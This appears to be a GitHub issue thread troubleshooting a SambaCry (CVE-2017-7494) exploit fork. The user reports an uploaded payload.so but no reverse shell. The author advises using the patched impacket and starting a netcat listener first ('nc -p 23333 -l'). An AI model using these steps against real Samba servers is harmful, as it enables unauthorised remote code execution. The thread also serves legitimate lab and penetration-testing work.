Trying to load module exits 0 and with message 'Explpoit Finished. Can you see the reverse shell?' but no, I cannot. :)

[pr0b3r7]

Hi @I-Rinka,

Bottom-line up front: 'Trying to load module exits 0 and with message 'Exploit Finished. Can you see the reverse shell?' but no, I cannot. :)'

Was hoping you could shed some light on the following scenario or if you have ever encountered it. From bottom to top:

• Listening for a reverse shell on 7777/TCP. Exploit seems to be running as expected until this piece. Traffic on --lport isn't seen either via tcpdump
• Running exploit.py with --lport 7777 and --rhost 10.10.0.55 and config.h was modified as expected.
• exploit.py is able to write the .so file to the share and payload.so size is > 0 once written to the share

Great profile and good job with this fork for CVE-2017-7494 a.k.a SambaCry a.k.a EternalRed.

Landed on your code from this link.

[I-Rinka]

The upload function seems to be correct. There two possible reasons that it doesn't work. Can you check it? : )

1. The python dependency is not correct. I modify the impacket lib for smb3 connection. If the python is using the dependency in my repo, it works. But if it points to a existing dependency on your host it can upload the module but cannot load the module.
2. Whether you setup a netcat listening process before you run the python exploit script as my python script does not give you the reverse shell interface. You should see reverse shell from a separate listening process. For example, run nc -p 23333 -l first and then run the python script to attach the shell to the netcat listening process. From your tcpdump execution sequence I guess that you might setup a listening process AFTER the exploit script. Please try setting up listening process in a sperate terminal and then runing the script again?

[pr0b3r7]

The upload function seems to be correct. There two possible reasons that it doesn't work. Can you check it? : )

1. The python dependency is not correct. I modify the `impacket ` lib for smb3 connection. If the python is using the dependency in my repo, it works. But if it points to a existing dependency on your host it can upload the module but cannot load the module. --> Made sure to delete impacket and crackmapexec since it had dependencies that did not allow your script to install impacket from your repo. After that installed it correctly.

2. Whether you setup a `netcat` listening process before you run the python exploit script as my python script does not give you the reverse shell interface. You should see reverse shell from a separate listening process. For example, run `nc -p 23333 -l` first and then run the python script to attach the shell to the `netcat` listening process. From your `tcpdump` execution sequence I guess that you might setup a listening process AFTER the exploit script. Please try setting up listening process in a sperate terminal and then runing the script again? --> The confusion here is my fault. I've been using tmux (terminal multiplexer) to open several windows at once. I've added a new screenshot in which I was running the exploit in a loop with no luck getting the RCE.. Added another listener on 23333/TCP with no luck. Packet capture on that port does not show any traffic either. The shared library module would load correctly to the share at /home/Public/*.so but no reverse shell on 7777/TCP nor any traffic in from that port in the interface.

Thank you for the reply. Response Inline above. If you have any other suggestions, please let me know. Thank you